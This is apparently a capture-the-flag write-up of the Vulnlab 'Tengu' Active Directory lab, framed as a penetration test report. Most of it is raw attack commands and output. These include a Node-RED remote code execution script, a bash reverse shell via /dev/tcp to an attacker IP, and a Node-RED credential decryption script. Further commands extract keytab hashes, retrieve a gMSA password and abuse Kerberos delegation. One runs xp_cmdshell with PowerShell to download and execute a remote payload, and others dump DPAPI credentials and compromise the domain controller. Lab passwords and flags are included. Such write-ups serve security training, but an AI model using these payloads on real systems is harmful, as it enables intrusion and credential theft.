Executive Summary
This comprehensive report documents a simulated penetration test aimed at assessing the security posture of a corporate network with the ultimate goal of compromising the a domain controller. The test was designed to emulate a sophisticated adversarial attack that strategically uses multiple cycles of lateral movement and privilege escalation. The test utilized a variety of attack techniques that align with the MITRE ATT&CK framework, each carefully chosen to exploit specific vulnerabilities within the network.
Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.
Enumeration
| Machine ID | IP |
|---|---|
| DC.tengu.vl | 10.10.168.117 |
| SQL.tengu.vl | 10.10.168.118 |
| 10.10.168.119 |
10.10.168.117
| Port | Service | Version |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services - Target_Name: TENGU - DNS_Computer_Name: DC.tengu.vl - rdp-ntlm-info: - Not valid before: 2024-03-10T13:32:17 - ssl-cert: Subject: commonName=DC.tengu.vl - DNS_Domain_Name: tengu.vl - NetBIOS_Computer_Name: DC - Product_Version: 10.0.20348 - NetBIOS_Domain_Name: TENGU |
10.10.168.118
| Port | Service | Version |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services - Product_Version: 10.0.20348 - Target_Name: TENGU - NetBIOS_Domain_Name: TENGU - NetBIOS_Computer_Name: SQL - Not valid before: 2024-03-24T13:19:50 - ssl-cert: Subject: commonName=SQL.tengu.vl - DNS_Computer_Name: SQL.tengu.vl - DNS_Tree_Name: tengu.vl - DNS_Domain_Name: tengu.vl - rdp-ntlm-info: |
10.10.168.119
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 |
| 1880 | vsat-control? | |
| On the linux machine Node-Red instance was found. | ||
| A quick google search leads me to |
https://gist.github.com/qkaiser/79459c3cb5ea6e658701c7d203a8c297
I ran the script.
python3 node-rce.py http://10.10.168.119:1880
nc -lvnp 80
bash -c 'exec bash -i &>/dev/tcp/10.8.2.41/8080 <&1'
"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="
ssh-keygen
touch authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEGm9hQH1xLdejYYVfn27qnd0twKOQItI76hnvwz6pf9 jay@hacksafely" >> authorized_keys
ssh nodered_svc@10.10.168.119
t2_m.winters@tengu.vl
Node Red Password Decrypt
#!/bin/bash
#
# Decrypt flows_cred.json from a NodeRED data directory
#
# Usage
# ./node-red-decrypt-flows-cred.sh ./node_red_data
#
jq '.["$"]' -j $1/flows_cred.json | \
cut -c 33- | \
openssl enc -aes-256-ctr -d -base64 -A -iv `jq -r '.["$"]' $1/flows_cred.json | cut -c 1-32` -K `jq -j '._credentialSecret' $1/.config.runtime.json | sha256sum | cut -c 1-64`
./node_red_flows_cred_decrypt.sh ~/vulnlab/tengu
- need two files as per script
{"d237b4c16a396b9e":{"username":"nodered_connector","password":"DreamPuppyOverall25"}}%
- Ligolo setup
cme mssql ips.txt -u nodered_connector -p 'DreamPuppyOverall25' --local-auth
10.10.168.118 sql.tengu.vl sql
10.10.168.117 tengudc.tengu.vl tengu.vl tengudc
impacket-mssqlclient nodered_connector:DreamPuppyOverall25@sql.tengu.vl
use Demo
select * from demo.information_schema.tables;
select * from users
b't2_m.winters' b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'
t2_m.winters
Tengu123
su - t2_m.winters@tengu.vl
sudo -l
sudo su
cd /root
VL{2c6d9107958f338659c95a810e4938d5}
python2.7 ../../tools/KeytabParser/KeytabParser.py krb5.keytab
{
"NODERED$@TENGU.VL": {
"keys": [
{
"EncType": "rc4-hmac",
"Key": "1CEO4tsMA6o2Ecnvik2/SQ==",
"KeyLength": 16,
"Time": "2024-03-26 03:42:23"
}
]
}
}
python3 ../../tools/KeytabParser/KeyTabExtract/keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : TENGU.VL
SERVICE PRINCIPAL : NODERED$/
NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
GMSA Passowrd
cme ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
dd258bdca5a05840758676a2ca90cf45
nxc ldap dc.tengu.vl -u 'gMSA01$' -H dd258bdca5a05840758676a2ca90cf45 --bloodhound -c All -d tengu.vl --dns-
server 10.10.168.117
impacket-getST -self -impersonate 'T1_M.WINTERS' 'tengu.vl/gMSA01$:@sql.tengu.vl' -hashes :dd258bdca5a05840758676a2ca90cf45 -spn 'MSSQLSvc/sql.tengu.vl'
impacket-mssqlclient -k sql.tengu.vl
enable_xp_cmdshell
Change from ligolo to sliver socks5 proxy
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.8.2.41/amsi64.txt'') | IEX"'
- SEImpersonat method 3
VL{e1f0df5961b9a6e06e9a3836cf414d56}
sharpdpapi machinetriage /showall
UserName : TENGU\T0_c.fowler
Credential : UntrimmedDisplaceModify25
[libdefaults]
default_realm = TENGU.VL
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname =false
fcc-mit-ticketflags = true
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
TENGU.VL = {
kdc = dc.tengu.vl
admin_server = dc.tengu.vl
}
[domain_realm]
.tengu.vl = TENGU.VL
kinit
proxychains kvno CIFS/dc.tengu.vl@TENGU.VL
proxychains impacket-wmiexec dc.tengu.vl -k
VL{6f106b09ff464e7ef0b36483e348dbc9}